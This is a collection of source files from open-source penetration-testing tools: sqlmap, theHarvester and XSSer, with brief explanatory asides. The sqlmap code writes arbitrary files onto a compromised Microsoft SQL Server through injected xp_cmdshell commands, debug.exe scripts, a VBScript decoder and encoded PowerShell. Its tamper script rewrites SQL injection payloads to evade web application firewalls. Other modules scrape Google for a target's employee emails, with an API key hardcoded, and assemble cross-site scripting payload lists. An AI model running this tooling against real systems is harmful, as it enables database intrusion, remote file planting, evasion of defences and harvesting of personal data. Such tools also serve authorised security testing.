Encodes string value from plain to Base64 format
>>> base64encode('foobar')
'Zm9vYmFy'
"""
return value.encode("base64")[:-1].replace("\n", "")
def base64pickle(value):
"""
Serializes (with pickle) and encodes to Base64 format supplied (binary) value
>>> base64pickle('foobar')
'gAJVBmZvb2JhcnEALg=='
"""
retVal = None
try:
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
except:
warnMsg = "problem occurred while serializing "
warnMsg += "instance of a type '%s'" % type(value)
singleTimeWarnMessage(warnMsg)
retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
return retVal
def base64unpickle(value):
"""
Decodes value from Base64 to plain format and deserializes (with pickle) its content
>>> base64unpickle('gAJVBmZvb2JhcnEALg==')
'foobar'
"""
return pickle.loads(base64decode(value))
def hexdecode(value):
"""
Decodes string value from hex to plain format
>>> hexdecode('666f6f626172')
'foobar'
"""
value = value.lower()
return (value[2:] if value.startswith("0x") else value).decode("hex")
def hexencode(value):
"""
Encodes string value from plain to hex format
>>> hexencode('foobar')
'666f6f626172'
"""
return utf8encode(value).encode("hex")
def unicodeencode(value, encoding=None):
"""
Returns 8-bit string representation of the supplied unicode value
>>> unicodeencode(u'foobar')
'foobar'
"""
retVal = value
if isinstance(value, unicode):
try:
retVal = value.encode(encoding or UNICODE_ENCODING)
except UnicodeEncodeError:
retVal = value.encode(UNICODE_ENCODING, "replace")
return retVal
def utf8encode(value):
"""
Returns 8-bit string representation of the supplied UTF-8 value
>>> utf8encode(u'foobar')
'foobar'
"""
return unicodeencode(value, "utf-8")
def utf8decode(value):
"""
Returns UTF-8 representation of the supplied 8-bit string representation
>>> utf8decode('foobar')
u'foobar'
"""
return value.decode("utf-8")
def htmlunescape(value):
"""
Returns (basic conversion) HTML unescaped value
>>> htmlunescape('a&lt;b')
'a<b'
"""
retVal = value
if value and isinstance(value, basestring):
codes = (('&lt;', '<'), ('&gt;', '>'), ('&quot;', '"'), ('&nbsp;', ' '), ('&amp;', '&'))
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
return retVal
def singleTimeWarnMessage(message): # Cross-linked function
raise NotImplementedError
def stdoutencode(data):
retVal = None
try:
# Reference: http://bugs.python.org/issue1602
if IS_WIN:
output = data.encode("ascii", "replace")
if output != data:
warnMsg = "cannot properly display Unicode characters "
warnMsg += "inside Windows OS command prompt "
warnMsg += "(http://bugs.python.org/issue1602). All "
warnMsg += "unhandled occurances will result in "
warnMsg += "replacement with '?' character. Please, find "
warnMsg += "proper character representation inside "
warnMsg += "corresponding output files. "
singleTimeWarnMessage(warnMsg)
retVal = output
else:
retVal = data.encode(sys.stdout.encoding)
except:
retVal = data.encode(UNICODE_ENCODING)
return retVal
def jsonize(data):
"""
Returns JSON serialized data
>>> jsonize({'foo':'bar'})
'{\\n "foo": "bar"\\n}'
"""
return json.dumps(data, sort_keys=False, indent=4)
def dejsonize(data):
"""
Returns JSON deserialized data
>>> dejsonize('{\\n "foo": "bar"\\n}')
{u'foo': u'bar'}
"""
return json.loads(data)
```
#### File: lib/parse/payloads.py
```python
from xml.etree import ElementTree as et
from lib.core.data import conf
from lib.core.data import paths
from lib.core.datatype import AttribDict
def cleanupVals(text, tag):
if tag in ("clause", "where"):
text = text.split(',')
if isinstance(text, basestring):
text = int(text) if text.isdigit() else str(text)
elif isinstance(text, list):
count = 0
for _ in text:
text[count] = int(_) if _.isdigit() else str(_)
count += 1
if len(text) == 1 and tag not in ("clause", "where"):
text = text[0]
return text
def parseXmlNode(node):
for element in node.getiterator('boundary'):
boundary = AttribDict()
for child in element.getchildren():
if child.text:
values = cleanupVals(child.text, child.tag)
boundary[child.tag] = values
else:
boundary[child.tag] = None
conf.boundaries.append(boundary)
for element in node.getiterator('test'):
test = AttribDict()
for child in element.getchildren():
if child.text and child.text.strip():
values = cleanupVals(child.text, child.tag)
test[child.tag] = values
else:
if len(child.getchildren()) == 0:
test[child.tag] = None
continue
else:
test[child.tag] = AttribDict()
for gchild in child.getchildren():
if gchild.tag in test[child.tag]:
prevtext = test[child.tag][gchild.tag]
test[child.tag][gchild.tag] = [prevtext, gchild.text]
else:
test[child.tag][gchild.tag] = gchild.text
conf.tests.append(test)
def loadPayloads():
doc = et.parse(paths.PAYLOADS_XML)
root = doc.getroot()
parseXmlNode(root)
```
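To clarify the XML shape that `parseXmlNode()` walks, here is a self-contained sketch with a simplified, inline `<boundary>` element. The tag names mirror sqlmap's payloads XML, but the concrete values are invented and the type conversion done by `cleanupVals()` is omitted:
```python
from xml.etree import ElementTree as et

SAMPLE = """
<root>
    <boundary>
        <level>1</level>
        <clause>1,2</clause>
        <where>1</where>
        <prefix>)</prefix>
        <suffix>AND ([RANDNUM]=[RANDNUM]</suffix>
    </boundary>
</root>
"""

root = et.fromstring(SAMPLE)
for element in root.iter('boundary'):
    boundary = {}
    for child in element:
        # Keep the raw text; the real parser converts digits and splits
        # comma-separated 'clause'/'where' values via cleanupVals().
        boundary[child.tag] = child.text.strip() if child.text else None
    print(boundary)
```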
#### File: dbms/mssqlserver/filesystem.py
```python
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace("    ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = hexencode(wFileContent)
# TODO: need to be fixed
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
psString = psString.encode('utf-16le')
psString = psString.encode("base64")[:-1].replace("\n", "")
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("converting the file utilizing PowerShell EncodedCommand")
commands = ("cd %s" % tmpPath,
"powershell -EncodedCommand %s" % psString,
"del /F /Q %s" % randFilePath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace("    ", "")
encodedFileContent = wFileContent.encode("base64")[:-1]
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "another technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
```
#### File: dbms/sybase/connector.py
```python
try:
import _mssql
import pymssql
except ImportError:
pass
import logging
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://pymssql.sourceforge.net/
User guide: http://pymssql.sourceforge.net/examples_pymssql.php
API: http://pymssql.sourceforge.net/ref_pymssql.php
Debian package: python-pymssql
License: LGPL
Possible connectors: http://wiki.python.org/moin/SQL%20Server
Important note: pymssql library on your system MUST be version 1.0.2
to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
except pymssql.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
return None
def execute(self, query):
retVal = False
try:
self.cursor.execute(utf8encode(query))
retVal = True
except (pymssql.OperationalError, pymssql.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
except pymssql.InternalError, msg:
raise SqlmapConnectionException(msg)
return retVal
def select(self, query):
retVal = None
if self.execute(query):
retVal = self.fetchall()
try:
self.connector.commit()
except pymssql.OperationalError:
pass
return retVal
```
#### File: sqlmap/tamper/space2dash.py
```python
import random
import string
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def tamper(payload, **kwargs):
"""
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')
Requirement:
* MSSQL
* SQLite
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "--%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
```
#### File: theHarvester/discovery/googleprofilesearch.py
```python
import time
import httplib
import myparser
import sys
from search_results import *
class search_google_profiles:
def __init__(self,word,options):
self.word=word
self.files="pdf"
self.total_results=u""
self.server="www.google.com"
self.server_api="www.googleapis.com"
self.hostname="www.google.com"
self.userAgent="(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
self.quantity=100
self.limit=options.limit
self.counter=options.start
self.api_key="AIzaSyBuBomy0n51Gb4836isK2Mp65UZI_DrrwQ"
def do_search_profiles(self):
h = httplib.HTTP(self.server)
h.putrequest('GET', '/search?num='+ str(self.quantity) + '&start=' + str(self.counter) + '&hl=en&meta=&q=site:www.google.com%20intitle:"Google%20Profile"%20"Companies%20I%27ve%20worked%20for"%20"at%20' + self.word + '"')
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, response_headers = h.getreply()
encoding=response_headers['content-type'].split('charset=')[-1]
self.total_results+=unicode(h.getfile().read(), encoding)
def process(self):
print "[-] Searching Google Profiles:"
while self.counter < self.limit:
self.do_search_profiles()
time.sleep(0.3)
self.counter+=self.quantity
print "\r\tProcessed "+ str(self.counter) + " results..."
def get_results(self):
raw_results=myparser.parser(self.total_results,self.word)
results = search_results()
results.people = raw_results.profiles()
return results
```
#### File: theHarvester/discovery/googlesearch.py
```python
import httplib
import myparser
import time
from search_results import *
import sys
class search_google:
def __init__(self,word,options):
self.word=word
self.total_results=u""
self.server="www.google.com"
self.hostname="www.google.com"
self.userAgent="(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
self.quantity=100 # the number to retrieve at once
self.limit=options.limit
self.counter=options.start
def do_search(self):
h = httplib.HTTP(self.server)
h.putrequest('GET', "/search?num="+str(self.quantity)+"&start=" + str(self.counter) + "&hl=en&meta=&q=%40\"" + self.word + "\"")
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, response_headers = h.getreply()
encoding=response_headers['content-type'].split('charset=')[-1]
self.total_results+=unicode(h.getfile().read(), encoding)
def process(self):
print "[-] Searching Google:"
while self.counter < self.limit and self.counter <= 1000:
self.do_search()
time.sleep(1)
self.counter+=self.quantity
print "\r\tProcessed "+ str(self.counter) + " results..."
def get_results(self):
raw_results=myparser.parser(self.total_results,self.word)
results = search_results()
results.emails = raw_results.emails()
results.hostnames = raw_results.hostnames()
return results
```
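An illustrative driver for the `search_google` class above. The class only needs an options object exposing `.limit` and `.start`; everything else (network access, the `myparser` module, Google's legacy search endpoint) has to be available for this to actually run, so treat it as a sketch of the calling convention rather than a working scraper:
```python
class _Options(object):
    limit = 200  # stop after this many results
    start = 0    # offset of the first result

searcher = search_google("example.com", _Options())
searcher.process()                # pages through results, 100 at a time
results = searcher.get_results()
print(results.emails)
print(results.hostnames)
```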
#### File: xsser/XSSer/main.py
```python
import os, re, sys, datetime, hashlib, time, urllib, cgi, traceback, webbrowser
import XSSer.fuzzing
import XSSer.fuzzing.vectors
import XSSer.fuzzing.DCP
import XSSer.fuzzing.DOM
import XSSer.fuzzing.HTTPsr
import XSSer.fuzzing.heuristic
from collections import defaultdict
from itertools import islice, chain
from XSSer.curlcontrol import Curl
from XSSer.encdec import EncoderDecoder
from XSSer.options import XSSerOptions
from XSSer.dork import Dorker
from XSSer.crawler import Crawler
from XSSer.post.shorter import ShortURLReservations
from XSSer.imagexss import ImageInjections
from XSSer.flashxss import FlashInjections
from XSSer.publish import publisher
from XSSer.post.xml_exporter import xml_reporting
from XSSer.tokenhub import HubThread
from XSSer.reporter import XSSerReporter
from XSSer.threadpool import ThreadPool, NoResultsPending
# set to emit debug messages about errors (0 = off).
DEBUG = 1
class xsser(EncoderDecoder, XSSerReporter):
"""
XSSer application class
"""
def __init__(self, mothership=None):
self._reporter = None
self._reporters = []
self._landing = False
self._ongoing_requests = 0
self._oldcurl = []
self._gtkdir = None
self._webbrowser = webbrowser
self.crawled_urls = []
self.checked_urls = []
self.successfull_urls = []
self.urlmalformed = False
# deploy your swarm (default: grey swarm!)"
# these parameters are connected to the GTK interface (swarm tab)
self.sn_service = 'https://identi.ca'
self.sn_username = 'xsserbot01'
self.sn_password = '<PASSWORD>'
self.sn_url = 'http://identi.ca/api/statuses/update.xml'
if not mothership:
# no mothership so *this* is the mothership
# start the communications hub and rock on!
self.hub = None
self.pool = ThreadPool(0)
self.mothership = None
self.final_attacks = {}
else:
self.hub = None
self.mothership = mothership
self.mothership.add_reporter(self)
self.pool = ThreadPool(0)
self.final_attacks = self.mothership.final_attacks
#self.pool = None
# initialize the url encoder/decoder
EncoderDecoder.__init__(self)
# your unique real opponent
self.time = datetime.datetime.now()
# this payload comes with vector already..
#self.DEFAULT_XSS_PAYLOAD = "<img src=x onerror=alert('XSS')>"
self.DEFAULT_XSS_PAYLOAD = 'XSS'
#self.DEFAULT_XSS_VECTOR = '">PAYLOAD'
self.DEFAULT_XSS_VECTOR = ''
# to be or not to be...
self.hash_found = []
self.hash_notfound = []
# other hashes
self.hashed_payload = []
self.url_orig_hash = []
# some counters for checker systems
self.errors_isalive = 0
self.next_isalive = False
self.flag_isalive_num = 0
#self.errors_jumper = 0
#self.next_jumper = False
# some controls about targets
self.urlspoll = []
# some statistics counters for connections
self.success_connection = 0
self.not_connection = 0
self.forwarded_connection = 0
self.other_connection = 0
# some statistics counters for payloads
self.xsr_injection = 0
self.xsa_injection = 0
self.coo_injection = 0
self.manual_injection = 0
self.auto_injection = 0
self.dcp_injection = 0
self.dom_injection = 0
self.httpsr_injection = 0
self.check_positives = 0
# some statistics counters for injections found
self.xsr_founded = 0
self.xsa_founded = 0
self.coo_founded = 0
self.manual_founded = 0
self.auto_founded = 0
self.dcp_founded = 0
self.dom_founded = 0
self.httpsr_founded = 0
self.false_positives = 0
# some statistics counters for heuristic parameters
self.heuris_backslash_founded = 0
self.heuris_une_backslash_founded = 0
self.heuris_dec_backslash_founded = 0
self.heuris_backslash_notfounded = 0
self.heuris_slash_founded = 0
self.heuris_une_slash_founded = 0
self.heuris_dec_slash_founded = 0
self.heuris_slash_notfounded = 0
self.heuris_mayor_founded = 0
self.heuris_une_mayor_founded = 0
self.heuris_dec_mayor_founded = 0
self.heuris_mayor_notfounded = 0
self.heuris_minor_founded = 0
self.heuris_une_minor_founded = 0
self.heuris_dec_minor_founded = 0
self.heuris_minor_notfounded = 0
self.heuris_semicolon_founded = 0
self.heuris_une_semicolon_founded = 0
self.heuris_dec_semicolon_founded = 0
self.heuris_semicolon_notfounded = 0
self.heuris_colon_founded = 0
self.heuris_une_colon_founded = 0
self.heuris_dec_colon_founded = 0
self.heuris_colon_notfounded = 0
self.heuris_doublecolon_founded = 0
self.heuris_une_doublecolon_founded = 0
self.heuris_dec_doublecolon_founded = 0
self.heuris_doublecolon_notfounded = 0
self.heuris_equal_founded = 0
self.heuris_une_equal_founded = 0
self.heuris_dec_equal_founded = 0
self.heuris_equal_notfounded = 0
# xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
self.verbose = 2
self.options = None
def __del__(self):
if not self._landing:
self.land()
def get_gtk_directory(self):
if self._gtkdir:
return self._gtkdir
local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
'gtk')
if os.path.exists(local_path):
self._gtkdir = local_path
return self._gtkdir
elif os.path.exists('/usr/share/xsser/gtk'):
self._gtkdir = '/usr/share/xsser/gtk'
return self._gtkdir
def set_webbrowser(self, browser):
self._webbrowser = browser
def set_reporter(self, reporter):
self._reporter = reporter
def add_reporter(self, reporter):
self._reporters.append(reporter)
def remove_reporter(self, reporter):
if reporter in self._reporters:
self._reporters.remove(reporter)
def generate_hash(self, attack_type='default'):
"""
generate a new hash for a type of attack.
"""
return hashlib.md5(str(datetime.datetime.now()) + attack_type).hexdigest()
def report(self, msg, level='info'):
"""
Report some error from the application.
levels: debug, info, warning, error
"""
if self.verbose == 2:
prefix = ""
if level != 'info':
prefix = "["+level+"] "
print msg
elif self.verbose:
if level == 'error':
sys.stdout.write("*")
else:
sys.stdout.write(".")
for reporter in self._reporters:
reporter.post(msg)
if self._reporter:
from twisted.internet import reactor
reactor.callFromThread(self._reporter.post, msg)
def set_options(self, options):
"""
Set xsser options
"""
self.options = options
self._opt_request()
def _opt_request(self):
"""
Pass on some properties to Curl
"""
options = self.options
for opt in ['cookie', 'agent', 'referer',\
'headers', 'atype', 'acred', 'acert',
'proxy', 'ignoreproxy', 'timeout',
'delay', 'tcp_nodelay', 'retries',
'xforw', 'xclient', 'threads',
'dropcookie', 'followred', 'fli',
'nohead', 'isalive', 'alt', 'altm',
'ald', 'jumper'
]:
if hasattr(options, opt) and getattr(options, opt):
setattr(Curl, opt, getattr(options, opt))
# attack functions
def get_payloads(self):
"""
Process payload options and make up the payload list for the attack.
"""
options = self.options
# payloading sources
payloads_fuzz = XSSer.fuzzing.vectors.vectors
payloads_dcp = XSSer.fuzzing.DCP.DCPvectors
payloads_dom = XSSer.fuzzing.DOM.DOMvectors
payloads_httpsr = XSSer.fuzzing.HTTPsr.HTTPrs_vectors
manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
# substitute the payload with a hash to check for false positives
self.hashed_payload = self.generate_hash('url')
checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
# heuristic parameters
heuristic_params = XSSer.fuzzing.heuristic.heuristic_test
def enable_options_heuristic(payloads):
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
return payloads
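# The branch tree below assembles the payload list from the selected sources.
# Top-level priority is: fuzz -> dcp -> script -> inducedcode -> heuristic -> dom,
# with a default '">PAYLOAD' vector when none of them is selected and the hash
# checker alone when only the hash option is set. Within each branch the hash
# pre-check payload and the heuristic parameters are prepended, while the DCP,
# DOM, manual-script and induced-code (HTTPsr) vectors are appended.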
if options.fuzz:
payloads = payloads_fuzz
if options.dcp:
payloads = payloads + payloads_dcp
if options.script:
payloads = payloads + manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
